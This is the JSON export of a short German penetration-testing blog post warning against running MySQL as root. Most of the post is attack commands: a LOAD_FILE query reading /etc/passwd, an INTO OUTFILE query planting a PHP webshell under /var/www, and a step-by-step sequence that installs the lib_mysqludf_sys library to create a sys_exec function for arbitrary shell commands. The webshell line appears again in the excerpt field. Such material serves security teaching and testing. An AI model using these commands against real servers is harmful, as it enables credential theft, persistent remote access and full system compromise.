{"id":811,"date":"2013-11-03T19:38:01","date_gmt":"2013-11-03T17:38:01","guid":{"rendered":"http:\/\/blog.patricksauer.net\/?p=811"},"modified":"2013-11-03T19:41:47","modified_gmt":"2013-11-03T17:41:47","slug":"hacking-mysql-mysql-server-als-root","status":"publish","type":"post","link":"https:\/\/security.sauer.ninja\/de\/pentest\/hacking-mysql-mysql-server-als-root\/","title":{"rendered":"Hacking MySQL: MySQL-Server als root"},"content":{"rendered":"<p>Dienste unn\u00f6tigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders d\u00e4mlich ist sie bei MySQL. \u00dcber LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische M\u00f6glichkeiten zur Verf\u00fcgung, die sich auch problemlos \u00fcber SQL Injections nutzen lassen:<\/p>\n<blockquote><p>SELECT LOAD_FILE(&#8222;\/etc\/passwd&#8220;);<\/p>\n<p>SELECT &#8218;&lt;?php system($_REQUEST[&#8218;cmd&#8216;]); ?&gt;&#8216; INTO OUTFILE &#8218;\/var\/www\/webshell.php<\/p><\/blockquote>\n<p>Diese beiden Funktionalit\u00e4ten lassen zwar schon genug Schaden zu, es geht aber noch eine Stufe h\u00e4rter: \u00dcber MySQL User Defined Functions (UDF) lassen sich beliebige shell-Kommandos ausf\u00fchren. Das Tool sqlmap beinhaltet die notwendigen Libs im Ordner udf. Die korrekte Lib auf den Server nach \/tmp\/ laden und aktivieren:<\/p>\n<blockquote><p>mysql&gt; use mysql;<\/p>\n<p>mysql&gt; create table abc(line blob);<\/p>\n<p>mysql&gt; insert into abc values(load_file(&#8218;\/tmp\/lib_mysqludf_sys.so&#8216;));<\/p>\n<p>mysql&gt; select * from abc into dumpfile &#8218;\/usr\/lib\/lib_mysqludf_sys.so&#8216;;<\/p>\n<p>mysql&gt; create function sys_exec returns integer soname &#8218;lib_mysqludf_sys.so&#8216;;<\/p>\n<p>mysql&gt; select sys_exec(&#8218;touch \/test&#8216;);<\/p><\/blockquote>\n<p>Privilege escalation by MySQL&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dienste unn\u00f6tigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders d\u00e4mlich ist sie bei MySQL. \u00dcber LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische M\u00f6glichkeiten zur Verf\u00fcgung, die sich auch problemlos \u00fcber SQL Injections nutzen lassen: SELECT LOAD_FILE(&#8222;\/etc\/passwd&#8220;); SELECT &#8218;&lt;?php system($_REQUEST[&#8218;cmd&#8216;]); ?&gt;&#8216; INTO OUTFILE &#8218;\/var\/www\/webshell.php &#8230; <span class=\"more\"><a class=\"more-link\" href=\"https:\/\/security.sauer.ninja\/de\/pentest\/hacking-mysql-mysql-server-als-root\/\">[Read more&#8230;]<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23],"tags":[79,87,88],"class_list":{"0":"entry","1":"post","2":"publish","3":"author-psauer","4":"post-811","6":"format-standard","7":"category-pentest","8":"post_tag-hacking","9":"post_tag-mysql","10":"post_tag-udf"},"_links":{"self":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/comments?post=811"}],"version-history":[{"count":8,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811\/revisions"}],"predecessor-version":[{"id":819,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811\/revisions\/819"}],"wp:attachment":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/media?parent=811"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/categories?post=811"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/tags?post=811"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}